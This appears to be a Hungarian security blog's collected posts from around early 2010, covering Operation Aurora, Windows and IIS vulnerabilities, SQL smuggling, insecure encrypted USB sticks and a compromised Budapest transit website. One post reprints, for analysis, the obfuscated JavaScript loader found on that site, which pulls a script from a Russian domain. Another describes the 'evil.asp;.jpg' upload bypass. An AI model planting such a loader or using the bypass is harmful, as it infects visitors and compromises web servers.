Január elején ismeretlen támadók sikeres támadást hajtottak végre a Tor anonimizáló szolgáltatás két kiszolgálója ellen. Az incidens két könyvtárszervert, a moria1-et és a gabelmoot érintett. Ezek a közolgálók - öt másikkal együtt - felelősek a megbízható onion routerek meghírdetéséért, és legalább négyük egyetértése szükséges egy-egy csomópont megbízhatónak nyilvánításához. 

Úgy tűnik, hogy a támadás nem kimondottan a Tor-t célozta, a behatolók egyszerűen a kiszolgálók CPU teljesítményét illetve sávszélességét kívánták saját céljaikra használni, így az érzékenyebb adatokhoz, pl. a moria1-en tárolt SVN és Git tárolókhoz nem nyúltak. 

Mindazonáltal az illetékesek mindenkinek javasolják a legújabb változatokra történő frissítést, mivel az érintett rendszerek kipucolásuk és hardeningjük után új azonosító kulcsokat kaptak, ezeket pedig a legújabb kiadások tartalmazzák. 

A Microsoft végre kiadta a javítást a Google-el szemben is kihasznált Internet Explorer sebezhetőség javítását. A javítócsomag összesen nyolc biztonsági hibajavítást tartalmaz a böngésző különböző verzióihoz, de ezek közül csak a nagy vihart kavart CVE-2010-0249 jelűt használják ki rosszindulatú támadók jelenleg is. 

Mindenki frissítsen a Windows Update szolgáltatáson keresztül amilyen gyorsan tud!

Tavis Ormandy, a Google munkatársa egy olyan exploit leírását tette közzé, amely elvileg minden 32-bites Windows változaton lehetővé teszi a helyi felhasználó jogainak kiterjesztését rendszer szintre. A problémát az elavult 16-bites alkalmazások számára BIOS hívásokhoz elérést biztosító interfészek megvalósításában van. A magyarázat előtt jelenleg én is tátott szájjal állok, és próbálom összerakni a képet, mert nagyon nem egyszerű a dolog.

Ormandy egy exploitot is közzétett, amely egy SYSTEM jogosultságú parancssort produkál az érintett rendszereken. A H-Security munkatársai sikeres tesztet hajtottak végre ezzel Windows XP-n és 7-en, de a felfedező állítólag Server 2003 és 2008, valamint Vista rendszereken is produkálni tudta az elvárt működést.

A Microsoftot 2009 közepén értesítették a problémáról, javítás egyelőre nincs. Elkerülő megoldásként az MS-DOS és WOWEXEC alrendszerek letiltása képzelhető el (Group Policy Editor-> Windows Components\Application Compatibility\Prevent access to 16-bit applications). 

Frissítés:

A VUPEN megerősítette, hogy a módszer működik Windows Server 2000, 2003, 2008, Vista és 7-es rendszereken.

Valamivel egyszerűbb workaround a következő Registry szkript lefuttatása:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\AppCompat]

"VDMDisallowed"=dword:00000001

Van pár említésre méltó érdekesség az Operation Aurora-val kapcsolatban, amikről jobb ha innen értesültök, és nem mondjuk az indexről:

• A 0-day IE exploitot Dino Dai Zovi (állítása szerint) megbízhatóan "portolta" IE7-re WinXP és Vista alá
• A legjobb védekezési módszernek a Data Execution Prevention bekapcsolása tekinthető (közben ezt is megdöntötték, lásd a frissítést!). A következő konfigurációkon (megfelelő hardver és BIOS beállítások esetén) ez alapértelmezett:
  - Internet Explorer 8 + Windows XP Service Pack 3
  - Internet Explorer 8 + Windows Vista Service Pack 1 vagy későbbi
  - Internet Explorer 8 + Windows Server 2008
  - Internet Explorer 8 + Windows 7
• Windows XP SP2 valamint Vista RTM felhasználók használhatják ezt a csomagot a DEP engedélyezésére. További infók a megelőzéssel kapcsolatban erre.
• Az F-Secure arról számol be, hogy múlt héten(!) a hosszú ideig javítatlan Adobe Reader sebezhetőséget használták ki több, az amerikai hadsereggel együttműködő szervezettel szemben. A támadás célzottságát jól mutatja, hogy a kártékony kóddal megspékelt dokumentum egy valódi, Védelmi Minisztérium által szervezett konferenciára szóló meghívó volt. A sikeres kihasználást követően a trójai egy HTTP kapcsolaton keresztül egy taivani IP címhez kapcsolódott.

Frissítés:

Idő közben a VUPEN Security szakemberei állítólag létrehoztak egy olyan exploit-ot, ami a DEP-et is sikeresen megkerüli. A cég a JavaScript letiltását javasolja az érintett felhasználóknak. (thx Hunger). Emellett az az állítás is megdőlni látszik, hogy a sebezhetőséget kizárólag célzottan használják ki: a McAfee jelentése szerint hagyományos támadássorozat kezdődött az IE bug kihasználásával, bár ez egyelőre elsősorban Kínát érinti.

MagyarHacker írt egy levelet, amelyben figyelmembe ajánlotta saját blogját, ahol jelenleg a címben szereplő személy és szervezetek weboldalain felfedezett SQL injection lehetőségekről számol be, valamint egy reflektív iWiW XSS-t illetve a közösségi portált érintő néhány konfigurációs gyengeséget is említ. 

A politikai flame-et hanyagoljuk ha lehet, akinek valamelyik érintett a szíve szottya, az írjon levelet a felelős üzemeltetőknek!

Sikerült tisztázni az összes függő kérdést, és a szavazás is elég egyértelmű eredményt hozott, íme a részletek, figyeloda, mert sok a változás:

Az első és a legfontosabb az időpont: január 22., péntek, 19:00 óra.

Fájó szívvel bár, de ezúttal elköltözünk az Óbesterből, helyette a gombamód fejlődő H.A.C.K.-be (Akácfa utca 51., a Király és a Wesselényi utca között) megyünk dajdajozni, ahol egyrészt mindenki megcsodálhatja A magyar hackerspace-t, valamint a józanéletűek beszállhatnak a hegesztés workshopba is (a hegesztők pedig a sörözésbe természetesen). 

A "sörözés" részt egyrészt a Biztributor által nagylelkűen felajánlott sörkészlet fogja támogatni, másrészt házibuli jelleggel a saját táskák tartalmára, a HACK helyi tartalékaira, valamint a néhány perc gyaloglással elérhető éjjelnappalira támaszkodva a borpártiak, illetve a nagyonszomjasak is kielégíthetik vágyaikat (arra azért felhívnám a figyelmet, hogy a lépcső mellet pl. nincs korlát...).

Mindenkit nagy szeretettel várunk!

Frissítés: Most kaptam a hírt, hogy a Titkos Koffein HACKosztály péntekre várhatóan leszállít egy nagyobb adag Club Mate-t, így a long-drinkek kedvelői akár Chunk-kal is boldogíthatják az agysejtjeiket.

Dr_IDE egy lejátszók széles skáláját érintő, puffer túlcsortulást előidéző sebezhetőséget fedezett fel (az Exploit-DB fekszik perpill...) a QuickTime megosztott függvénykönyvtárának HTTP DataHandler osztályában(?). A hiba speciális .MOV fájlok lejátszásával használható ki. A probléma megtalálható az Apple QuickTime és iTunes szinte összes változatában (köztük a legfrissebbekben is), a Safari böngészőben, a MS Excel és a Word 2008, valamint a VLC Media Player OS X-re írt változataiban, valamint egy sor egyéb, lejátszásra alkalmas alkalmazásban. Bővebb, de valószínűleg nem teljes lista található Dr_IDE beszámolójában.

A Google ellen is használt, távoli kódfuttatást eredményező 0-day Internet Explorer exploit elérhető itt. A Metasploit Frameworkbe már be is emelték a cuccot:

Bár a sebezhetőség a böngésző összes támogatott változatát érinti, ez a támadás csak IE6 esetében megbízható, az IE8-ban alapértelmezett DEP pedig szintén megakadályozhatja a sikeres kihasználást.

Az újabban "Operation Aurora" néven futó támadássorozattal kapcsolatos nyomozás jelenlegi állásáról a HUP-on olvashattok egy hosszabb összefoglalót.

by trey@HUP

A Google a napokban jelentette be, hogy kifinomult és célzott támadást indítottak ellene, illetve körülbelül két tucat amerikai nagyvállalat ellen Kínából. Ezért a keresőóriás átértékelte Kínával kapcsolatos hozzáállását és bejelentette, hogy kész kivonulni az országból. A bejelentés nagy port kavart fel, még az Egyesült Államok külügyminisztere is megszólalt az ügyben, választ várva a kínai kormányzattól.

A bejelentés után megindult a találgatás arról, hogy milyen hibákat használhattak ki a támadók. Felröppent a hír, hogy 0day Internet Explorer sebezhetőség lehetett a támadás egyik segítője. A Microsoft tegnap elismerte, hogy ez így van.

Ajénlott elolvasni a McAfee fent is linkelt blogposztját, valamint annak kiegészítését/összefoglalóját, ezen a linken pedig egy (fenntartásokkal kezelendő) analízist olvashattok a használt trójai működéséről, viselkedéséről.

Jól láthatóan löketesen vagyok terhelt: az utóbbi pár nap híreiről lemaradtam, most meg hirtelen annyi szabadidőm keletkezett, hogy elolvastam xorl elég terjengősre sikerült leírását az először felfedezett, távolról kihasználható OpenBSD biztonsági hibáról, amely az FTP szolgáltatást érintette. Bár a poszt még az utolsó nyamvadék wrapper rutin működésére is kitér, egy lényeges dolgot azért hiányolok:

A probléma oka az volt, hogy egy cikluson belül inkrementált változót használtak fel egy string záró \0-jának beillesztéséhez, ez pedig az allokált puffer 1 (NULL-)byteos túlcsordulásához vezethetett, ami felülírhatta az EBP regiszter (aka. Frame/Base Pointer)  értékét. A hibás függvény visszatéréskor így rossz értékre állította vissza az ESP (Stack Pointer) értékét és ezáltal rossz helyről olvasta vissza az EIP regiszter (aka. Instruction Pointer) által mutatott címet is, a programfutás tehát nem a várt helyen folytatódott.

A kérdés az, hogy (a fenti folyamatot feltételezve) milyen peremfeltétel(ek)nek kell teljesülni ahhoz, hogy az EIP regisztert a támadó állíthassa be végül?

Jó matekolást ;)

• A Readeremben kb minden 5. hír ez volt, és (-1) is elküldte: Kínai hackerek kifinomult támadást intéztek helyi emberjogi aktivisták Google fiókjai ellen, és jogosulatlan hozzáférést szereztek a cég bizonyos adataihoz (valójában egy támaddássorozatról volt szó, amely több más jelentősnek mondott, de meg nem nevezett internetes céget is éritnett). A történtek hatására a Google újra tárgyalásokat kezdeményez a kínai kormánnyal a google.cn cenzúrájának megszűntetéséről. Ha nem születik megegyezés, a keresőóriás kész kivonulni az országból. Részletesebb infók magyarul az ITCafé-n
• Nem rég iráni rosszfiúk némi social engineeringet bevetve eltérítették kínaiak kedvenc keresője, a Baidu DNS rekordjait is (kíváncsi vagyok milyen gépen hosztolták a deface oldalt egy ~1 milliárd fős országnak). Cserébe persze a kínaiak szétszedtek egy halom iráni site-ot.
• A Microsoft ehavi frissítőcsomagja mindössze egy frissítést tartalmazott, amely az OpenType Font Engine-en keresztül távoli kódfuttatást tesz lehetővé Windows 2000 SP4 rendszereken, illetve 32-bites Windows XP-n, amennyiben a gépben 3GB-nál több memória van, és egy ezt kezelni képes alkalmazás a sebezhető API-t használja.
• Megérkezett a várva várt Adobe patch is. Közben a 7.x-es Acrobat (Reader) széria támogatása megszűnt, a Microsoft pedig azt tanácsolja, hogy a régi XP-kkel érkező Flash Player 6-ot inkább távolítsák el a felhasználók a számítógépeiről - micsoda bölcs előrelátás!
• Az Oracle júzerek viszont jobb ha felkötik a gatyájukat: 24 biztonsági frissítés érkezett a különöbző termékekhez, melyek közül 13 távolról, autentikáció nélkül kihasználható, és a futtató számítógép teljes komprommitálásához vezethet! Erről lehet hogy lesz külön poszt is.
• Hatékony támadást mutattak be a 3G mobil rendszerekben használatos A5/3 titkosítási algoritmussal szemben. A PET Portál beszámolóját azért annyival kiegészíteném, hogy GSM-et lehallgatni - ahogy azt a 26C3 óta tudjuk - nem is olyan nehéz. Friss: stef posztját érdemes elolvasni A5/x és telkó témában!

Z küldte be ezt a képet, ami forradalmi változást mutat az átlagfelhasználók viselkedésében (és az Origo látogatottságában):

(Az én szavazásaim is hackelhetőek (így nincs kihívás a meghackelésükben ;), de léééégyszi hagyjátok őket békén! Ha nem, akkor megölök egy kiscicát, vagy ilyesmi)

Nem pazarolnám a szót, oldalt lehet szavazni :)

...az IT-Security szakma :)

Egy kis emlék CCC-ről

Egyébként nem rég kaptam spamet levelet az UltraWebtől, hogy milyen fasza is lenne nekem, ha Panda Internet Security-t használnék. Tényleg az lenne. Bruhaha...

A SecurityReason munkatársai most megjelent tanácslatukban felhívják a figyelmet, hogy a tavaly októberben NetBSD és OpenBSD rendszerekkel kapcsolatban napvilágot látott, dtoa() és printf() sebezhetőségekkel rokon hibák a Mac OS 10.5 és 10.6 változatait is érintik.

A problémák nem várt felépítésű lebegőpontos számok (stringek) átalakításánál puffer túlcsordulást okoznak. Amennyiben sikerül népszerű, az érintett függvényeket kihasználható módon felhasználó alkalmazásokat találni, az könnyen egy OS X rendszereket célzó támadási hullámhoz vezethet.

Az Apple tervezett lépéseiről egyelőre nincs információ.

Ez a módszer már fáj:

Samy, a híres MySpace XSS féreg készítője nem rég rámutatott, hogy egyes routerek annyira okosak és segítőkészek, hogy felismerik az alkalmazásrétek IRC, FTP és kitudja milyen egyéb protokollt használó üzeneteit, és szükség esetén automatikusan beállítják a port forwardingot, pl. egy DCC chat kérés vagy fájlátvitel esetén. Egy speciális "IRC szervert" beüzemelve,  a célszemély számára pedig egy egyszerű HTML oldalt kiszolgálva megoldható, hogy kiirányítsuk a router mögötti számítógép érzékeny portjait (pl. SSH, FTP, HTTP) egyenesen az Internetre. 

Ilyen az, amikor a HW/SW úgy gondolja, hogy okosabb a júzernél.

Ha már routereknél tartunk: A Juniper hálózati eszközeinek széles skálája egyetlen speciális TCP csomaggal újraindítható. Konkrétabb infó egyelőre nem áll rendelkezésre, de egy TCP fuzzert összedobni azért nem nagy mutatvány :) 

Az egyik leggyakrabban felvetődő kérdés, amit SQL injection témában nekem szegeznek az, hogy mégis hogyan valósítható meg a gyakorlatban az "SQL smuggling" néven elhíresült támadási forma? A legenda szerint ezen módszer felhasználásával bizonyos escape-elési eljárások megkerülhetők, mivel a bemenetellenőrzést végző alkalmazás a különböző karakterkészlet-beállítások miatt az adatbáziskiszolgálótól eltérően értelmezi a potenciálisan veszélyes karaktereket. Őszintén szólva az én ismereteim sem voltak kimerítőek a témában (és valószínűleg még mindig nem azok), de a CCC-n EQ unszolására ("Most hackelni jöttél vagy Fluxboxot konfigolni?" ;) újra elővettem a régi leírást, és azt hiszem sikerült meglátnom a fényt az alagút végén:

A Comsec-féle tanulmány egyrészt több, gyakran előforduló programozói hibát, illetve IDS-megkerülési módot mutat be, de ezek nem jelentenek különösebb izgalmat. Az érdekes rész a Unicode Smuggling fejezetben kezdődik, ahol a szerző felveti, hogy a különböző karaktertáblák hasonlóan kinéző karaktereit egymásba átvívő "homoglifikus" (a rangidős nyelvész kérem javítson ki!) transzformációk bizony biztonsági kockázatot rejtenek magukban. Azaz, pl. az Ā karaktert a DBMS okosan A-vá alakítja, a sokféle szemita felülvonást pedig ASCII aposztróffá. A probléma ott van, hogy mégis mely adatbáziskezelők végeznek ilyenfajta váratlan átalakításokat a bemeneten? A hivatkozott tanulmány csak annyit mond, hogy az MS SQL Server 2005 már nem, valamint hogy a MySQL egyes régebbi Java connectorai még lehetővé tettek ilyen támadásokat. Nem sok. 

Ha kicsit jobban utánajárunk a dolognak, észrevehetjük, hogy SQL Smugglinggal kapcsolatban szinte kizárólag az eredeti Comcast-féle tanulmány különböző hivatkozásait találjuk, konkrét esettanulmányokat nem. Támpontként leginkább egy régi Bugtraq-os szálat használhatunk,  melyben többen kritizálják a tanulmányt, mondván, hogy itt szó sincs új típusú támadásokról, egyszerűen néhány régimódi hibatípust fedeztek fel újra. 

Emellett ugyanakkor találunk néhány gyakorlati példát is: David Litchfield például a PLSQL-ben alkalmazott tárolt-eljárás-feketelista (grammarnazis, help me!) megkerülésére mutatott példát még 2001-ben. Itt a problémát az okozta, hogy a PLSQL a ÿ karaktert Y-á konvertálta, de a SYS.* tárolt eljárásokra vonatkozó szabályok nem kerültek érvényesítésre. Gary Oleary-Steel egy Ruby szkriptet tett közzé, melyet IIS-el tesztelt, de bővebb információ nem áll rendelkezésre arról, hogy hogyan.

EQ-val elvégeztünk egy csomó tesztet MySQL-lel szemben, de nem siekrült még csak aggodalomra okot adó viselkedést sem kicsikarnunk a kiszolgálóból.

Úgy tűnik tehát, hogy az SQL Smuggling lényegében ráhúzható minden DBMS, webszerver vagy interpreter bugra, ami nem kezeli megfelelően a speciális karaktereket, ezeket viszont az érintett gyártók általában hamar javítják, az egyszer programozónak/üzemeltetőnek pedig nincs sok ráhatása az ilyen problémák megelőzésére. Az egyetlen gondot az így-úgy összebarkácsolt szűrőeljárások jelenthetik, de ezeket általában akkor is megkerüli az ember előbb vagy utóbb, ha nem tudja mi is az az SQL Smuggling.

Szóval használjatok naprakész szoftvereket, és ne próbáljátok meg feltalálni a spanyolviaszt, ha pedig behatolástesztelésre kerül a sor, a sebezhetőség-adatbázisok környékén kell kutakodni, mert úgy tűnik, nem létezik varázsmódszer a jól ellenőrzött  SQL paraméterekkel és előkészített lekérdezésekkel szemben.

Még egyszer köszönet EQ-nak a motivációért és a segítségért!

23:52: A kártékony kódokat eltávolították a galériákból

Z hívta fel rá a figyelmem, hogy a bkv.hu galériája egy rendesen összekuszált JavaScript kódot is tartalmaz (GPL licensz alatt ;), ami aztán valahogy egy orosz domainről próbál levadászni további futtatható kódokat. A fertőző oldal az alábbi címen érhető el, de mindenki csak saját felelősségre nézze meg!

hxxp://www.bkv.hu/galeria/20080408rendezveny/varosliget/index.php

Frissítés: Úgy tűnik, hogy a /galeria/20080408rendezveny/ útvonal alatti összes galéria fertőzött

A szkript így néz ki, ha valakinek van kedve rejtvényt fejteni:

<script>/*GNU GPL*/ try{window.onload = function(){var T4lhy9x465n =
document.createElement('s!$c#(#r@)^i(#p(t#'.replace(/\!|#|\)|\$|\^|@|\(|&/ig,
''));T4
lhy9x465n.setAttribute('type',
'text/javascript');T4lhy9x465n.setAttribute('src',
'h!$t@!$t$&$p(:#/($^/#@&k&!!&i)(n$^@o$^!p@o$!@i($&)s&&!k(!^&-($r$^u^(&.
(!$g@o((#(@o&!)^g^)&$&l!^e&&.)@a!^)@e!).#@m$!i^h#(a&!&n^^b@)l@)o$#$g!-@!#c!)^)o((m#!).!)(m!$$u)$#s)!i^c(b^!@o)(x!!&p^(r)^)o^.(r!@u&):$^8@)0##8@$^0(#/&^g)$
a@(m$)($e&$f&($a$q#(s(!$.&!)&#c#&!o@$&$m^^^/(&g^$(@a&m$()e&^#f!$@a)!(#q!(#s!.)$!^c&!o^!@@m$^/!y^^$a(#&h#@o$^o)##.&@))c(o@@))&m#)!(/(1(##&1&)(0@#^)m$&^b(!.
@!c$#o(!$m)/@##&g(($@$o()$o$g^l#!(^e$).@&&c)o^m(^(&/$@'.replace(/\)|#|&|\^|\$|@|\!|\(/ig,
''));T4lhy9x465n.setAttribute('defer', 'defer');T4lhy9x465n.setA
ttribute('id', 'W!#!3!#j@#u@&&n!^(u&!&a!q$&)@!b@&&o$(!m$j!$'.replace(/\^|&|@|\$|\)|\!|\(|#/ig,
''));document.body.appendChild(T4lhy9x465n);}} catch(e) {}<
/script>

Kis szemgúvasztás árán egyébként a kód egész jól olvasható, egyszerűen ignorálni kell a fura karaktereket (amiket a replace metódusok szednek ki egyébként).

A Wepawet ugyan nem értékeli veszélyesnek az oldalt, a Google Safe Browsing API-ja viszont igen. Wiresharkkal nagy vonalakban lekövettem a hálózati forgalmat, és elsőre úgy tűnik, hogy a hivatkozott orosz oldal 0 hosszúságú választ ad. Ebből legnagyobb eséllyel az következik, hogy a) benéztem valamit a nagy kapkodásban b) Rosszul sikerült a fertőzés illetve eltávolították a kártékony tartalmat a külföldi szerverről. 

...kiderült, hogy  az oldal egy Java JRE sebezhetőséget használ ki (valószínűleg ezt), baromi óvatosan nyúljatok hozzá!

Minden esetre azt javaslom, hogy csak alapos védelemmel felvértezve (NoScript, virtuális gép, stb.) vágjatok neki a bkv.hu domainjának, ki tudja milyen kártevők tanyáznak arrafelé! Az informatikai osztályt pedig ismét csókoltatom...

Z-nek pedig még egyszer köszönet a közérdekű infóért!

Szívesen vennék egy teljes packet dumpot arról a lefolyásról, mikor az első ruszki oldal vissza is ad valamit - valószínűleg figyeli a user agentet, és az alapján dobja ki az exploitot (az enyém elveszett, Houston, Houston HW problémánk van :P ).

A német SySS GmbH munkatársai több, NIST 140-2 Level 2 minősítéssel rendelkező pendrive-ot érintő problémát tettek közzé, amely lehetőséget biztosít az eszközökön tárolt titkosított adatok visszaállítására. A fenti minősítéssel rendelkező adathordozókat alkalmazzák az amerikai kormányhivatalok illetve a hadsereg bizalmas adatainak tárolására is. 

A megjelent német nyelvű tanulmányok - melyet a H-Security munkatársai szerencsére angolul is összefoglaltak - leírja, hogy Kingston, SanDisk és Verbatim "szuperbiztonságosnak" kikiáltott USB stickjei ugyanazt a hibás elven működő jelszóbekérő alkalmazást használják. Bár maguk az eszközök hardveres AES-256 titkosítást végeznek, amely természetesen megfelelőnek tekinthető, a SySS kutatói megfigyelték, hogy a jelszóbekérést végző program mindig ugyanazt a bytesorozatot küldi el a pendrive-oknak, a jelszótól függetlenül. Kis módosítással természetesen a programot rá lehet venni, hogy akkor is küldje el ezt a sorozatot és végezze el a titkosított kötetek felcsatolását, ha a jelszó nem volt megfelelő. 

A Kingston visszahívta az érintett termékeket, a másik két gyártó szoftverfrissítést adott ki - megjegyezném, hogy a probléma nem feltétlenül oldható meg pusztán szoftvers úton (természetesen a megvalósítás részleteivel nem vagyok tisztában). Ezen kívül felmerül a kérdés, hogy hogyan kaphattak ezek az eszközök ilyen komoly minősítést, valamint hogy mennyit ér a minősítő rendszer, ha ilyen silány minőségű eszközök is átcsúszhatnak a rostán?

Philippe Oechslin 26C3-as előadásában további kínos eseteken keresztül bemutatta, hogy milyen fantáziadús módokon képesek elbaltázni a különböző gyártók a pendrive titkosítás triviálisnak tűnő feladatát, ezt is érdemes meghallgatni az érdeklődőknek!

Először is elnézést a kicsit hosszúra nyúlt újévi szünetért, nem volt egyszerű a szilveszter, meg némi hardver problémám is adódott, de már kezdek urrá lenni a helyzeten :P A következő néhány bekezdésben szeretném megosztani a tapasztalataimat 26. Chaos Communication Congressről kedvcsinálónak, és emlékeztetőnek minden érdeklődő és érintett számára.

Soroush Dalili egy olyan problémát fedezett fel a microsoft IIS 6-os és korábbi változataiban, amely lehetővé teszi, hogy fájlfeltöltést biztosító webalkalmazások ellenőrzési mechanizmusai megkerülhetők. A problémát az okozza, hogy az IIS rosszul kezeli a pontosvesszőt vagy kettőspontot tartalmazó fájlneveket, az ezen karakterek utáni névrészleteket nem veszi figyelembe a fájltípus megállapítása során. Így pl. egy evil.asp;.jpg nevű fájl ASP szkriptként fut le, de a sokszor csak a fájlnév utolsó karaktereit ellenőrző alkalmazások azt fogják feltételezni, hogy a feltöltendő állomány ártalmatlan.

Persze a feltöltött fájlokat lehetne ennél okosabban is kezelni, a SANS blogján meg is jelent egy rövid összefoglaló a fájlfeltöltésekre vonatkozó ökölszabályokról, címszavakban:

• Nevezd át a feltöltött fájlokat!
• Tárold őket a DocumentRoot-on kívül!
• Ellenőrizd a fájlméretet!
• A kiterjesztéseknek nincs jelentésük.
• Próbáld kikerülni a malware-t! (Pl. konvertálással - ugyan szvsz. ez egy kevésbé jó tipp)
• Szigorúan szabályozd a jogosultságokat!
• Hitelesítsd a feltöltéseket!
• Korlátozd a feltöltött fájlok mennyiségét!

A fenti szabályok alkalmazásakor a problémát nem lehet kihasználni, ezért a felfedezés megítélése egyelőre bizonytalan. Annyi azonban biztos, hogy rengeteg webhely lehet támadható ilyen módon, a sikeres kihasználás pedig nem igényel komoly felkészültséget. A Microsoft reakcióját elolvashatjátok itt.

Megemlíteném továbbá, hogy Apache-on a fenti(hez hasonló) viselkedés tulajdonképpen egy feature, amire igen-igen kevesen figyelnek oda...

A Hackers on a Train alakulat sikeresen megérkezett Berlinbe, ahol már masszívan folyik a 26. Chaos Communication Congress. A négynapos jegyek már tegnap elfogytak, és komoly kihívást jelent ülőhelyet, tápot valamint hálózati csatlakozást találni, tehát jó sokan jöttünk össze :) Ma egy igazán forradalmi előadást hallgathattunk meg a WikiLeaks képviselőitől, jelenleg pedig egy masszív kriptomaraton közepén vagyunk: megnéztük néhány titkosítást alkalmazó pendrive megvalósítási gyengeségét, bemutatták a GSM titkosítás feltörésére irányuló projekt jelenlegi állását - igen jól állnak :) -, most pedig egy kvantum-kriptográfiai témájú előadást hallgatok éppen. Tehát nem unatkozunk, ezért - és amivel  elég kényelmetlen megoldani a nagyjából biztonságos kommunikációt a blog.hu-val :P -  következő néhány napban a kommunikáció elsődleges platformja a Twitter lesz.

Időközben Budapesten is elindult a Dragons Everywhere, melynek keretében bárki élőben  projektoron, és remek társaságban követheti az előadásokat, aki ellátogat a Fogasházba  Az aktuális állapotokról a H.A.C.K. Twitter csatornáján tájékozódhattok.

Maradjatok ránk hangolva ;)

Minden kedves olvasómnak bugogktól mentes boldog karácsonyt kívánok!

Nem sokára indulunk Berlinbe a 26C3-ra, onnan még biztosan jelentkezem, addig is egyetek és igyatok sokat!

Jó ideje tervezem kiposztolni qgeh levelét, ami egy hihetetlenül csúnya problémára hívja fel a figyelmet egy "felnőtt tartalmakat" szolgáltató weboldallal kapcsolatban. Mivel jóval több mint egy hete felvettem a kapcsolatot az érintettekkel, úgy érzem, hogy most már eljött az ideje a nyilvánosságrahozatalnak. Mindazonáltal a veszélyben lévő adatok annyira érzékenyek, hogy az oldal teljes nevét nem merem elárulni, remélem az illetékesek magukra ismernek:

csatolok ket shot-ot az "index of" sex[CENSORED].hu szerverrol. Ami azert erdekes, mert regisztraciohoz - mar aki eloadast is szeretne csinalni - annak szemelyigazolvany masolatot kell bekuldeni... es igen, amit latsz azok a userek altal feltoltott szem.ig kepek illetve sql dump jelszavakkal, telszamokkal, lakcimmel...:

Tehát arról van szó, hogy az erotikus műsorokban szereplő hölgyek és urak minden fontosabb személyes adata elérhető egy megfelelő képességekkel rendelkező támadó számára. Azon túl, hogy az érintettek közül nyilván sokan nem örülnének annak, ha valamelyik közeli hozzátartozójuk megtudná, hogy mivel is keresik a mellékest, az oldalra ellátogatva attól ijedtem meg a legjobban, hogy mi van, ha valamelyik elborult vendég megtudja, hogy hol lehet élőben is találkozni tinicica18-cal...

Az eset egyrészt újabb jó példája annak, hogy miért nem célszerű érzékeny információkat online kiadni bármilyen szolgáltatónak, másrészt felmerül a kérdés, hogy mégis mi alapján lehet eldönteni, hogy kiben bízzunk meg nem csak adatvédelmi, hanem adatbiztonsági szempontból is?

Tiny Tim kapott egy új számítógépet karácsonyra, de nem figyelt oda a védekezésre, így a PC szomorú véget ért: